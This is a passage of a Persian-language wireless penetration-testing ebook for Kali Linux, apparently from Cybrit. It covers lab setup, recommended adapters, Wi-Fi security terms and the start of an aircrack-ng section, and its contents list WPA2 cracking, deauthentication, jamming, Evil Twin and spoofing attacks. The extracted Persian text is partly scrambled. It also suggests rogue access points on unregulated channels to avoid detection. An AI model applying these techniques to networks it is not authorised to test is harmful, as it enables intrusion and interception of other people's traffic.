سکونیل یلاک اب سلریاو ذوفن تست / 1 - سایبریتتیربیاس -...

92
1 / ذ واست نفو ت ی رلس با کال ی ل ی نوکس

Upload: others

Post on 03-Feb-2021

5 views

Category:

Documents


0 download

TRANSCRIPT

  • نوکسیل یبا کال رلسیتست نفوذ وا/ 1

  • فهرست مطالب 3 ................................................................................................................................. مقدمه

    7 .................................................................. در ماشین مجازی کالی لینوکس VMware Tools نصب -1

    8 ........................................................................... های شبکه برای تست نفوذ وایرلسبهترین کارت -2

    11 ....................................................................................................... آداپتور وایرلساندازی راه -3

    11 ...................................................................................................... اصطالحات شبکه وایرلس -4

    Aircrack-ng ................................................................................................ 22شروع کار با ابزار -5

    Aircrack-ng ....................................................................................... 21با استفاده از WEPکرک -6

    Aircrack-ng .............................................................................. 31با استفاده از WPA2-PSKکرک -7

    PMKID ................................................................................ 31وایرلس با حمله WPA2-PSKکرک -8

    Reaver ............................................................................................. 11با استفاده از WPSکرک -9

    14 .............................................................................. به شبکه وایرلس Deauthenticationحمله -11

    mdk3 ............................................................ 18پیشرفته به شبکه وای فای با ابزار Jammingحمله -11

    48 ........................................................................................ پیدا کردن نام شبکه وای فای مخفی -12

    11 ................................................................................................ دور زدن مک فیلترینگ مودم -13

    11 .................................................................................. کارت وایرلس TX Powerافزایش قدرت -14

    Evil Twin ........................................................................................... 11ساخت اکسس پوینت -15

    Wifiphisher ....................................................................... 74از کاربر با ابزار WPA2گرفتن پسورد -16

    Ettercap................................................................................. 78با ARP Spoofingاجرای حمله -17

    Ettercap ................................................................................ 84با DNS Spoofingاجرای حمله -18

    12 .....................................................................................................................قدم بعدی چیست؟

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 3

    مقدمه

    سال پیش با 7سایبریت خوانده باشید. حدود سالم. معین کاردانی هستم. شاید مقاالت من را در صنعت هک و امنیت سایبر به صورت حرفه ای آشنا شدم و دیدم این زمینه چقدر هیجان انگیز است

    ی ا و بازار بزرگی دارد. به دلیل محدودیت در ایران، رقابت بسیار ضعیف شده است و کسی اگر حرفه تواند به موفقیت های بزرگی برسد.کار کند میو قانونی

    یراخود ب یکه از مهارت ها بشناسند اهیکاله س یبریمجرمان ساشاید برخی از مردم هکرها را به دید هادیسف در حال تبدیل شدن به کاله به سرعت هااهیکاله س نیااما امروزه استفاده کنند. شان عمناف

    وجود هکرهای اخالقی برای سازمان ها و شرکت ها روز به روز افزایش پیدا کرده اهمیت رایز هستند، اطالعات به مهمترین موضوع تبدیل شده است.محافظت از و است

    تخصص برتر دنیا است! 5یکی از تیامن لگریتحلامروزه مشاغل متخصص تست نفوذ و

    کوچک و یدر دستور کار سازمانها شده است و لیتجارت بزرگ تبد کیبه یاست که هک اخالق واضحپس به ا،ه ستمیس یریپذ بیآسپیدا کردن و یاخالق هکراما برای تبدیل شدن به یک است. قرار گرفتهبزرگ

    د.یدار ازین تیدانش و خالق

    تست نفوذ وایرلس چیست؟

    شود و هدف آن ارزیابی و تست نفوذ وایرلس همان هک وایرلس است که بصورت قانونی انجام می شود:تست نفوذ وایرلس در حمالت زیر خالصه میافزایش امنیت شبکه وایرلس است.

    . کرک کلید شبکه )حمالتی برای بدست آوردن کلید یا رمز عبور شبکه وایرلس(1

    شود(ت برای شنود اطالعات رد و بدل شده در شبکه انجام می)این حمال MITM. شنود و حمالت 2

    (است MITM. گرفتن دسترسی )حمله پیشرفته تری که بر پایه حمالت مهندسی اجتماعی و 3

    دامه در ااما ، تمام امکانات الزم برای شروع تست نفوذ وایرلس مهیا است!تاپ داریدپاگر شما یک لبرای یک پنتستر حرفه ای وایرلس موردنیاز است. پس بیایید شروع کنم کهنیز تجهیزاتی را معرفی می

    کنیم.

  • 1/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    یک آزمایشگاه بسازیدکنند. های نفوذ خود را آزمایش می تستتمام هکرها و پنتسترهای حرفه ای یک آزمایشگاه دارند که در آن

    برای ساخت آزمایشگاه تست نفوذ وایرلس ما به موارد زیر نیاز داریم:

    اجراینصب و یبرا شبکه وایرلس داخلی کارتبه دلیل داشتن تاپلپاز ام: 4GBبا حداقل رم تاپلپ کی عنوانبهاز ویندوز و (attacker) مهاجمماشین عنوانبهکنم. از کالی لینوکس استفاده می نوکسیل یکال

    .خواهیم کرد( استفاده victim)یا هدف قربانیماشین

    (Packet injection) هابستهو شنود قیکه از تزر میدار ازین وایرلس USBکارت کی: ما به وایرلسآداپتور یک ی تکنیک هایی توانید به خوباگر کارت وایرلس داخلی شما از این قابلیت پشتیبانی کند میحتی . کند یبانیپشت

    تجهیزات حرفه ای نیز دارید!دهم را پیاده کنید. اما برای یک تست نفوذ حرفه ای نیاز به که در ادامه آموزش می

    WPSو WEP ،WPA/WPA2 یرمزگذار یکه استانداردها میدار ازین پوینت اکسسروتر یا یک ما به: روتر کی د.را داشته باش

    ازیموردن ابزارهای

    برای هک کردن و اجرای تست نفوذ ما نیاز داریم ابزارهایی موردنیازمان را دانلود کنیم. اما محققان سایبری برای راحتتر کردن کار متخصصان امنیت، سیستم عامل هایی را طراحی کرده اند که اکثر ابزارهای موردنیاز آنها

    را دارا است و هکرها دیگر نیازی ندارند بصورت دستی آن ها را نصب کنند.

    شاید شنیده باشید که لینوکس محبوب ترین سیستم عامل هکرها است. درسته این سیستم عامل هرآنچهکه یک هکر نیاز دارد را دارد. سادگی، سرعت، انعطاف پذیری و داشتن جامعه مهمترین مزییت این سیستم

    تند. شوند مبتنی بر لینوکس هسعامل است. بنابراین سیستم عامل هایی که برای هک و تست نفوذ طراحی میو اکثر ابزارهای هک را در خود جای است که برپایه دبیان بوده (Kali Linux) بهترین آنها کالی لینوکس از یکی

    داده است و مهمترین مزییت آن رایگان بودن و محبوب بودن آن در میان جوامع هکرها است.

    ندوزتان توانید آن را در کنار ویپس ما نیاز داریم کالی لینوکس را نصب کنیم. خب برای نصب کالی لینوکس میکنم برای شروع کالی را در داخل ویندوز تان نصب یشنهاد مییا اینکه در داخل ویندوزتان نصب کنید. من پ

    نیاز دارید. VMWareکنید، برای اینکار شما به یکی از ابزارهای مجازی سازی مانند

    چندین سیستم عامل را در آن نصب کنید و به طور همزمان بتوانید دهدیبه شما اجازه م VMWare نرم افزار .دیکن دانلود و نصب اینجااز می توانید رااین ابزار نسخه نیآخر از آنها استفاده کنید.

    kali.org/downloadsبعد از اینکه این نرم افزار را نصب کردید باید فایل ایمیج کالی لینوکس را از آدرس خواهید کالی را در کنار اگر می بودن سیستمتان را بررسی کنید. سپس 64bitیا 32bitابتدا . دیکن دانلود

    از آن استفاده کنیم vmاما همانطور که گفتم بهترهست در را دانلود کنید. live جیمیا ویندوزتان نصب کنید که در ادامه نحوه نصب آن را نشان می دهم.

    https://soft98.ir/os/virtual-machine/1232-vmware-workstation.htmlhttps://soft98.ir/os/virtual-machine/1232-vmware-workstation.htmlhttps://kali.org/downloads

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 4

    نصب آسان() VMwareدر نوکسیل ینصب کال دیاشما ب ستمیحداقل س کار نیا یبرااست. VMWare اکنون موقع نصب کردن کالی لینوکس داخل نرم افزار

    کنیم و بدون انجام دادن مراحل می وارد vmware کالی را در یراحتبهما در اینجا اشد.رم داشته ب گیگ 1 . استفاده کنیم آن از، نصب

    نوکسیل یکال جیمیدانلود ا -1

    بروید kali.org/downloadsکالی را دانلود کنیم. به صفحه دانلود vmware ایمیجباید ابتدا فایل کار نیابرای .بیتی را دانلود کنید 32بیتی یا 11آن را با توجه به سیستمی که دارید، ایمیج و

    دیدانلود شده را اکسترکت کن جیمیا لیفا -2

    موردنیاز یکه فضا دی. توجه داشته باشدیدانلود شده استفاده کن جیمیاستخراج ا یبرا دیتوانیم winrar ابزار ازاز آن دیکه قصد دار دیاکسترکت کن یشنیرا در پارت جیمیا لیاست. فا تیگابایگ 11حدود لیاستخراج فا یبرا .دیاستفاده کن یکال یمجاز نیماش رهیمحل ذخ عنوانبه

    دیوارد کن vmwareرا نوکسیل یکال جیمیا -3

    اکسترکت شده را لیفا ریو مس دیکن کیکل Open یرو File یاز منو vmwareدر نوکسیل ینصب کال یبرا .دیوارد کرد vmwareرا در یکال راحتیبهشما مییگویم کی. تبر دیانتخاب کن

    https://www.kali.org/downloads/

  • 1/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    طوربه دینیبیمکه طورهمین. دیرا مشاهده کن یو رمز ورود کال ینام کاربر دیتوانیم description در کادرفضا به خودش اختصاص تیگابایگ 88و cpu هسته 1رم و تیگابایگ 2مقدار یکال یمجاز نیماش فرضپیش

    .داده است

    Processorsو از قسمت دیکن کیکل Edit virtual machine settings یرو فرضپیش ماتیتنظ رییتغ یبرا فضا نیا د،ینباش یکال یمجاز سکید ینگران مقدار فضا نی. همچندیکاهش ده cpuهسته 2را به ماتیتنظ .شودینمشما مصرف شنیپارت یاز فضا بارهکیبههست و کینامید صورتبه

    نوکسیل یکال یمجاز نیماش یاجرا -4

    نهیشده گز دهی. در باکس پرسدیکن کیکل Power on this virtual machine نهیگز یرو یکال یاجرا یبراcopied it و رمز عبور را ینام کاربر ن،یاز مشاهده صفحه الگ بعد .دیرا انتخاب کنkali یایو به دن دیکن پیتا

    .دیوارد شو یکال

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 7

    . پس برای اجرای ندارد را superuser کالی دسترسی فرضپیشدیگر کاربر ، Kali 2020.1انتشار بعد از نوکسیل یرا در کال rootحساب کاربر دیتوانیمیا ابتدای دستور موردنظر اضافه کنیدرا sudoدستورات باید

    .دیمشکل را حل کن نیو ا دیفعال کن

    rootکاربر حسابفعال کردن

    نیم.کمیمشخص rootکاربر ی حساببرا رمز عبور کزیر یو با دستور کنیممی بازرا نالیترم

    sudo passwd root

    رمز عبور کی. و در ادامه میرا وارد کن میکرد نیالگ یکه با آن به کال یکاربر رمز عبور دیبا ابتدابعد اجرای دستور (.شودینمداده شیرمز عبور نما نالی)در ترم میکنیموارد rootکاربر حساب یبرا را toorبرای مثال دلخواه .میشویم نیالگ toor پسوردو rootنام کاربری و با میکنیم log out را نوکسیل یکال سپس

    بروید! cybrit.ir/?p=2684توانید به آدرس برای دیدن فیلم آموزشی می

    نوکسیل یکال یمجاز نیدر ماش VMware Tools نصبا ر vmware tools دیبا کالی و ویندوز بین امکان جابجایی فایل و نیفول اسکر شینمابرای داشتن صفحهما

    . کنیم در ماشین مجازی کالی نصب

    VMware Tools کونیآ اکنون. دیکن کیکل Install VMware Tools یرو VM یاز منو VMware افزارنرمدر . 1 .دیکن کیآن کل یرو دوبارباز کردن آن یکرد. برا دیمشاهده خواه کالی دسک تاپ یرا رو

    .دیکن یرا در دسک تاپ کپ VMware-tools….tar.gz لی. فا2

    -vmware-tools. اکنون فولدر دیرا انتخاب کن Extract hereو دیکن کیراست کل لیفا ی. در دسک تاپ رو3distrib .اکسترکت شده است

    .دیرا وارد کن distrib-tools-cd /Desktop/vmwareو دستور بازکنیدرا نالی. ترم1

    :دیدستور را اجرا کن نی. اکنون ا4

    ./vmware-install.pl -d

    .دینصب را ادامه ده دیخواهیم ایکه آ شودیم. از شما سؤال دیرا بزن Enter. رمز عبور خود را وارد کرده و 1 ، فقط با فشار دادنشودیم دهیسؤال پرس یاز شما تعداد اکنون .دیرا فشار ده Enterکرده و پیرا تا Y حرف

    Enter تا نصب تمام شود دیو صبر کن دیر یفرض را بپذهمه پیش.

    .دیکن اندازیراهمجدداً rebootرا با دستور ستمی، سنصب . پس از اتمام7

    .دیدسک تاپ را در حالت تمام صفحه مشاهده کن دیتوانیم ستم،یاندازی مجدد و ورود به ساز راه پس

    https://cybrit.ir/?p=2684

  • 8/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    وایرلس برای تست نفوذ شبکه هایبهترین کارتاکثر . میدار ازین monitor modeو packet injection تیکارت شبکه با قابل کیبه رلسیتست نفوذ وا یبرا

    شبکه مناسب خریداری کنیم.، بنابراین باید یک کارت این دو ویژگی را ندارند شبکههای کارت

    توانید برای تست های آزمایشگاهی از آن اگر کارت شبکه داخلی لپ تاپ شما این دو ویژگی را داشته باشد می استفاده کنید. اما برای تست های حرفه ای و پیشرفته حداقل به دو کارت وایرلس نیاز داریم.

    یو گاه میدار ازیکوچک ن رلسیآداپتور وا کیپس ما به میعمل کن عیبصورت پورتابل و سر دیبا مااوقات یگاه نیاس تر و حس نیر قدرتمندت میدار ازیپس ن میبرد و توان کارت استفاده کن نیشتر یاز ب میخواه یم نیزاوقات

    هم یجنبه اقتصاد رلسیکارت وا دیخر همچنین . میبزرگ استفاده کن یرا به همراه آنتن ها رلسیآداپتور وا را برطرف کنند و ازشانین خواهندیارزان هستند و فقط م یاز افراد به دنبال آداپتورها یمثال برخ یدارد، برا

    نفوذ را تجربه کنند. ستت یواقع طیدر مح یبازده نیشتر یبا ب خواهندیم زین یبرخ

    بخوبی پشتیبانی می شوند، پس ما باید به intelو Ralink ،Realtek،Atheros کالی برخی از چیپست هایدر دنبال آداپتورهایی باشیم که در آن از چنین چیپست های استفاده شده است. اگر کارت شبکه داخلی شما از

    .دیاستفاده کن یتست نفوذ و هک قانون یاز آن برا دیتوانیمکند، چنین چیپست هایی استفاده می

    و میکن افتیرا در رلسیشبکه وا یپکت ها یفا یتمام وا میتوان یمس آداپتور وایرل monitor mode یژگیبا وپکت به اکسس یکسری قیتزر یبرا زین packet injection یژگی. ومیرا شنود کن رلسیبه عبارت بهتره شبکه وا

    .باشدیبه منظور اختالل در شبکه هدف م نت،یپو

    یآنها بطور کامل با کال پستیهستند که چ ALFA یکارت ها رلس،یتست نفوذ وا یکارت شبکه برا نیبهتر اما کارتهای دیگری نیز هستند که از چنین چیپست هایی دارند. ییباال اریسازگار است و قدرت و عملکرد بس

    توانیم آنها را تهیه کنیم.و ما می کنندپشتیبانی می

    گاهرتزیگ 2.1فرکانس در گیگاهرتزی هستند. 4و 2.1شبکه های وایرلس بطور کلی در دو محدوده فرکانس . از این رو کارت هایی که ( وجود دارد114تا 31کانال )از 23 گاهرتزیگ 4در فرکانس و( 11تا 1کانال )از 11

    گیگاهرتزی هستند 2.1می گویند و به کارت هایی که فقط Dual bandهر دو فرکانس را پشتیبانی کنند single band خرید یک کارت کارامد و حرفه ای را داریم بهترهست آنکه از پس اگر قصد شود.نامیده میDual

    band و جدیدترین استاندارهایa/b/g/n/ac کند تهیه کنیم.پشتیبانی می

    بررسیمی کنیم: single band و Dual band در زیر بهترین آداپتورهای تولید شده را در دو دسته

    Dual band (2.4GHz & 5.0GHz) wireless 802.11a/b/g/n/ac آداپتورهای

    a/b/g/n/ac استانداردهایو Dual band (2.4GHz & 5.0GHz)کارت های معرفی شده در زیر از دو باند .گیگاهرتزی را دریافت کنند 2.1و 4توانند تمام فرکانس ها و کانالهای وایرلس کنند. بنابراین میپشتیبانی می

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 1

    Alfa AWUS1900 (chipset: Realtek RTL8814AU)

    برد. در حال حاضر این کارت شبکه گران های شمارا به یک سطح کامالً جدید میاین آداپتور چهار آنتن مهارتپشتیبانی IEEE 802.11ac/a/n/g/b از استانداردهای .ترین و قدرتمندترین کارت شبکه برای تست نفوذ است

    مگابیت در 188را مدیریت کند و سرعت 4GHzو 2.1GHzتواند دو باند کند. این بدان معنی است که میمی .داشته باشد 4GHzمگابیت در ثانیه برای 1388و تا 2.1GHzثانیه برای

    Alfa AWUS036ACH (chipset: Realtek RTL8812AU)

  • 18/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    Alfa AWUS036AC (chipset: Realtek RTL8812AU)

    Panda Wireless PAU09 N600 (chipset: Ralink RT5572)

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 11

    ASUS USB-AC68 (chipset: Realtek RTL8814AU)

    TP-LINK Archer T9UH (chipset: Realtek RTL8814AU)

    Edimax AC600 USB (chipset: Realtek RTL8811AU)

    Tenda U12 (chipset: Realtek RTL8812AU)

  • 12/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    Dual Band (2.4GHz & 5.0GHz) Wireless 802.11a/b/g/n آداپتورهای

    Alfa AWUS052NH (chipset: Ralink RT3572)

    Alfa AWUS036NHA (chipset: Atheros AR9271)

    بهترین پیشنهاد برای خرید کارت وایرلس Alfa AWUS036NHA ، آداپتورac تا پیش از تولید آداپتورهای سریکند که به ما امکان افزایش پهنای باند میاستفاده چند ورودی و چند خروجی Mimo بود. این کارت از ویژگی

    .دهددر کانال های مختلف را می

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 13

    Alfa AWUS051NH (rev v2, chipset: Ralink RT3572)

    Single-band (2.4GHz) wireless 802.11 b/g/n آداپتورهای

    Alfa AWUS036NEH (chipset: Ralink RT3070)

  • 11/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    TP-LINK TL-WN722N (rev v1, chipset: Atheros AR9271)

    ای هست. با قیمتی ارزان و عملکرد مناسب، های مبتدی و حرفهترین آداپتورها برای پنتستراین یکی از محبوبحمل یک ماژول بسیار کاربردی و مفید است. آنتن آن قابلیت جابجایی دارد و اگر شما وجور و قابلجمع .تر متصل کنیدبزرگ Dbi توانید آنتنی باد، میخواهید محدوده باالتری را داشته باشیمی

    .باید درایور آن را نصب کنید 3و 2شود، اما در ورژن های این آداپتور بخوبی در کالی پشتیبانی می 1ورژن

    Panda PAU06 USB (chipset: Ralink RT5372)

    TP-LINK TL-WN822N (rev v3, chipset: Realtek RTL8192CU)

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 14

    ASUS USB N14 (rchipset: Ralink RT5372)

    TP-LINK TL-WN823N (rev v1, chipset: Realtek RTL8192CU)

    Netis WF2123 (chipset: Realtek RTL8192CU)

    Tenda W311M (chipset: Ralink RT5370)

  • 11/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    وایرلسآداپتور اندازیراهرلس های وایکارت وریدرا کالی از اکثر رایز ،است یآسان اریبسکالی لینوکس کار در آداپتور وایرلس اندازیراه

    یا سایر آلفا های. کارتداشته باشندرا هاو شنود بسته قیتزر . بخصوص آداپتورهایی که تواناییکندیمی بانیپشت نید. انندار اجیاحتکالی در یماتیتنظ چی، به همخصوص تست نفوذکارت کیعنوان به کارتهای معرفی شده

    . آن را متصل کنید تا اجرا شود است یکافشود یعنی محسوب می Plug-and-play دستگاه ککالی یدر ها کارت .دینصب کنهمراهشان CDرا از هاآن وریدرا دی، بادیاستفاده کن ندوزیدر و هاکارتاین از دیدار یاما اگر سع

    :طبق زیر عمل کنیدکارت خود اندازیراه یبرا

    Removable Devicesبروید و از VMبه تب VMWare افزارنرمدر .دیتاپ وصل کنرا به لپ . آداپتور خود1 .دیکنرا انتخاب Connectروی کارت خود کلیک کنید و

    VMWare > VM > Removable Devices > Wi-Fi Card > Connect (Disconnect from host)

    ، یازمج نیدر داخل ماش آداپتور وایرلسبه یاتصال و دسترس یبرا پس .میکنیمرا اجرا کالی vmwareما در

    .می( جدا کنندوزی)و زبانیم ستمیآن را از س دیبا

    و سایر ماشین های مجازی، کارت داخلی شما شناسایی نمی شود. پس اگر قصد خرید vmware: در نکته یا در کنار ویندوز اجرا کنید تا بتوانید از آن استفاده کنید. liveکارت وایرلس ندارید باید کالی لینوکس را بصورت

    آموزش ویدیویی نصب کالی لینوکس در کنار ویندوز

    https://cybrit.ir/?p=2598

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 17 را تایپ کنید و اینتر بزنید. iwconfig دستور. دیکن کیکل ترمینال یبر رو. در کالی لینوکس 2

    برای است. جادشدهیا وایرلس ماکارت یاست که برا (interface)اینترفیسی wlan0 دینیبیمکه طورهمان

    را اجرا کنید. ifconfig، دستور هااینترفیسبررسی وضعیت فعلی

    دربرای مثال اگر .دهدیحال اجرا را نشان مدر وهای فعال اینترفیسفرض فقط طور پیشبه ifconfig دستور

    :دستور زیر فعال کنیم آن را با استفاده از دی، ما بافعال نباشد wlan0 اینترفیس نجایا

    ifconfig [Interface] up ifconfig wlan0 up

    وارد کنید.را wlan0 ifconfigدستور wlan0 برای مشاهده اینترفیس سپس

  • 18/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    بررسی ویژگی کارت شبکه برای تست نفوذ وایرلس

    :بررسی کنید monitor روجی دستور زیر را برای عبارتخود خ کارت monitor mode برای بررسی ویژگی

    iw list

    را Injection is working دستور زیر را اجرا کنید. در خروجی باید عبارت packet injection برای بررسی

    :مشاهده کنید

    aireplay-ng --test wlan0mon or aireplay-ng -9 wlan0mon

    وایرلس داخلی خود برای بررسی داشتن این دو ویژگی انجام دهید. حتما این تست را روی کارت

    گر اولویت اپیشنهاد می کنم به ترتیب عملکرد، برد و قیمت لیست شده اند. کردم معرفی ی که در باالآداپتورهای است و Alfa AWUS1900گیگاهرتزی باشد بهترین گزینه 2.1و 4اول شما عملکرد و دریافت برد در دوباند

    عملکرد بسیار باالیی دارد. اما اگر در محیط آزمایشگاهی هستید یکی Alfa AWUS036ACبا نیمی از قیمت آن .را تهیه کنید TP-LINK TL-WN822Nیا TP-LINK TL-WN722Nاز آداپتورهای ارزان قیمت مثل

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 11

    شبکه وایرلس اصطالحات (AP (access point اکسس پوینتها نم.آشنا ک شبکه وایرلسخواهم شمارا با اصطالحات میبرای شروع

    Ghz گیگاهرتز 4و 2.4هایی بینقادر به ارسال سیگنال ها AP کند. اینرا ارسال می (RF) رادیویی هایسیگنال ,882.11a, 802.11bعنوان هستند که با تعدادی از استانداردهای مختلف مطابقت دارند. این استانداردها به

    802.11g, 802.11n, 802.11ac شوندشناخته می.

    .آمده است WiFi های کلیدی استانداردهایطور مختصر ویژگیدر جدول زیر به

    قادر به گرفتن nکه یک آداپتور وایرلس طوریطورمعمول باهم سازگار هستند، بهاین استانداردها به

    .تمرکز خواهیم کرد n و b ،g ترین استانداردهاباشد. ما روی پراستفادهمینیز b و g هایسیگنال

    امنیتی های تکنولوژی -1

    وجود وایرلس. چندین تکنولوژی امنیتی در هستندامنیتی وایرلس ویژگی مهمی های ، تکنولوژیهاازنظر هکر .دکنمیهای امنیتی استفاده یک از این تکنولوژی کداماکسس پوینت از حمله ما بستگی دارد که و ددار

    .ها بیندازیمی سریع به آنبنابراین، بیایید نگاه

    WEP

    WEP (wired equivalent privacy) طور که از نامش پیداست، این وایرلس بود. همان اولین برنامه امنیتیحریم شخصی است که در همان شده بود، که اساساً معادلبرنامه برای ارائه امنیت به کاربر نهایی طراحی

    .متأسفانه با شکست مواجه شد که ه بودمحیط سیمی مورداستفاده قرار گرفت

    راحتی بسیار آسان است. به RC4 به دلیل اجرای ناقص الگوریتم رمزنگاری WEP به دالیل مختلفی، کرک بسیار کوچک از یک وکتور اولیه WEP دقیقه بشکنیم. این به این دلیل است که 4را در کمتر از WEP توانیممی

    (IV) ها گرفته شود و سپس اینجریان داده تواند درکند که میاستفاده می IV تواند برای کشف رمز عبور می .های آماری استفاده شودبا استفاده از تکنیک

  • 28/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    WPA

    WPA پاسخی به نقاط ضعف WEP عنواناغلب بهکه بود WPA1 شود تا بتوان آن را ازشناخته می WPA2 افزار جدید بدون نیاز به سخت WEP امنیتبرای افزایش (TKIP) کلید موقتی ازپروتکل . این تشخیص داد

    WEP کند، اما حمالت آماری مورداستفاده برای شکستناستفاده می WEP استفاده کرد. این هنوز از رمزگذاری .گیر استتر و وقتدر این پروتکل بسیار سخت

    WPA2-PSK

    WPA2-PSK سازی پروتکلپیاده WPA2 .طور که از نامش همانبرای کاربر خانگی یا یک شرکت کوچک است (pre-shared key (PSK شدهاست که از یک کلید به اشتراک گذاشته WPA2 سازیپیداست، این پیاده

    تر شود و اگرچه بسیار امنها استفاده میکند. این استاندارد امنیتی که امروزه در اکثر خانوادهاستفاده می .پذیر استاست، اما هنوز به حمالت مختلف آسیب

    WPA2-AES

    WPA2-AES سازی سازمانیپیاده WPA2 از است. این استاندارد AES (Advanced Encryption Standard) است که RADIUS کند که بسیار امن است. این اغلب همراه با یک سرورها استفاده میبرای رمزگذاری داده

    تر مراتب سختپذیر است، اما بهامکاناگرچه کرک این پروتکل .شده استبرای احراز هویت اختصاص داده ، اما همیشه ما نیاز به کرک نداریم و راههای راحتتری هم وجود دارد.است

    WPA3

    WPA3 نسخه سوم و آخرین پروتکلی است که تاکنون طراحی شده است و برای جایگزینیWPA2 .معرفی شدند شاید بنظر امنیت کافی داشته باشد. اما استفاده میک CCMP-128این پروتکل که از استاندارد فوق پیچیده

    اخیرا با آسیب پذیری کشف شده در هنگام هندشیک چهار طرفه، نشان داد که هیچوقت امنیت مطلق نیست.

    Channels کانال -2

    گر مختلف با یکدی های ارتباطیجریانشود باعث میکه های متعددی است مانند رادیو، وایرلس نیز دارای کانال درگیگاهرتزی هستند. 4و 2.1شبکه های وایرلس بطور کلی در دو محدوده فرکانس کنند. پیدا نتداخل

    .وجود دارد( 114تا 31کانال )از 23 گاهرتزیگ 4در فرکانس و( 11تا 1کانال )از 11 گاهرتزیگ 2.1فرکانس

    11تا 1های استفاده فقط در کانالها برای کند و دستگاهارتباطات وایرلس را تنظیم می FCC متحدهدر ایاالتکند. دیگر کشورها نیز ممکن است از رنج استفاده می 11تا 1و ژاپن 13تا 1های فعال هستند. اروپا از کانال

    کانال در rogue AP یک با ایجادمفیدی باشد که بسیار تواند اطالعات، این میهابرای هکر .کامل استفاده کنند .دحده و از شناسایی امنیتی، مخفی شمتهای وایرلس ایاالتستگاهدر د بتوان 11تا 12

    APمگاهرتز در اطراف فرکانس مرکزی آن است. برای جلوگیری از تداخل، Mhz 22 هر کانال دارای عرضو 1، 1های هم افتادن، کانالها استفاده کند، اما برای جلوگیری از هرگونه رویتواند از هر یک از این کانالمی .شوندمتحده استفاده میاغلب در ایاالت 11

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 21 PWR قدرت سیگنال -3

    ها AP باشد. بسیاری از (dBm (500 milliwatts بلدسی 27ها نباید بیش از سیگنال اکسس پوینت قدرت evil twinsایجادبرای هکرها در دهیم کهتوانیم این محدودیت را تغییر دارای این محدودیت هستند، اما ما می

    .استمناسبی بسیار که در آن قدرت سیگنال مهم هست، تکنیک rogue AP و

    4- Aircrack-Ng

    kali linux که این ابزار در میکنیاستفاده م aircrack-ngاز ابزار ، ما کرک کلید شبکه وایرلستقریباً برای استفاده نیز Aircrack-ngبه همراه reaver یا cowpatty مانند یاز ابزارهای دیگر همچنینموجود است.

    م. در ادامه آن را بررسی خواهم کرد. بنابراین ما باید با آن آشنا شویکنیم، می

    آداپتورهای وایرلس -5

    لس حرفه ای وایر شدن به یک هکر یکی از تجهیزات ضروری برای تبدیلپیش از این در مورد آن توضیح دادم که ف ما کافی نیست. اهداتاپ شما برای لپوایرلس داخلی طورکلی، آداپتوربه .است وایرلس آداپتور

    آنتن -6

    ها و AP شتریوجود دارند. ب (دارجهت) directional)همه جهِت( و omnidirectional ها در دو نوعآنتنها در همه جهات ارسال و که آن یمعن نیبه ا شوند،یهمه جهِت همراه م یهابا آنتن رلسیوا یآداپتورها

    ال و معموکه از نوع همه جهِت است، هستندیک آنتن خارجی آداپتورهای وایرلس اغلب دارای .کنندیم افتیدر (.افزایش دهدمتر 488تا تواند سیگنال را آنتن در هنگام استفاده میاین یعنی) هستند 4dBi برددارای

    نید. اباشن دیاز راه دور مف نتیاکسس پو کی یرو تیجستجو و اکسپلو یبرا توانندیم زیدار نجهت یهاآنتن کنند. افتیارسال و در لومتریک 118حدود ای لیما 188از شیرا ب WiFi یهاگنالیس توانندیها مآنتن

    اده استف یتوجهدر فواصل قابل رلسیدار است که اغلب در تست نفوذ واآنتن جهت کیاز یانمونه Yagiآنتن

    کرد. یداری( خر dBi 28برد یدالر )دارا 188کمتر از یمتیق با توانیکه آن را م شودیم

    اهید بود تقریباً روی هر شما قادر خو شود. خیلی زودآغاز میهک وایرلس انگیز ما به سفر هیجان در ادامه .شروع کنیم بیایید پس .انجام بدیدتست نفوذ وایرلسی

  • 22/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    Aircrack-ng شروع کار با ابزارً یدقاکنون که ما جا نی. در امیرا شروع کن وایرلسهک کردن میتوانیم کند،یکار م یچطور ایرلسو میدانیم قا

    .میکنیم یرا معرف aircrack-ngابزار یعنی وایرلس کرک یابزارها نیاز بهتر یکی

    aircrack-ng ابتدا. میدار ازین رلسیآداپتور وا کی به اگر تا اینجا آمده باشید پس حتما متوجه شدید که نیازمجموعه، نیاست. در ا WiFi یها( شبکهcrackکرک ) یاز ابزارها برا یابلکه مجموعه ست،یابزار ن کی فقط

    مرحله را با استفاده نیچند دیما با کرک یوجود دارد، اما براوایرلس پسورد کرک یبرا aircrackابزار به نام کی !میرا شروع کن aircrack-ngمجموعه یمعرف دییایب پس .میانجام ده عهمجمو نیا گرید یاز ابزارها

    iwconfigدستور -1

    شروع کنیم، باید مطمئن شویم که کالی لینوکس از آداپتور وایرلس ما پشتیبانی aircrack-ng قبل از اینکه با .توانیم در لینوکس دستور زیر را تایپ کنیمکند. برای این کار میمی

    iwconfig

    گوید که این کند و به من میمن را شناسایی می USB لینوکس، کارت وایرلسبینیم کالی طور که میهمان .استفاده کنیم aircrack-ng ب، اکنون آماده هستیم که ازخ .و غیره داردرا 882.11 استانداردکارت

    airmon-ngدستور -2

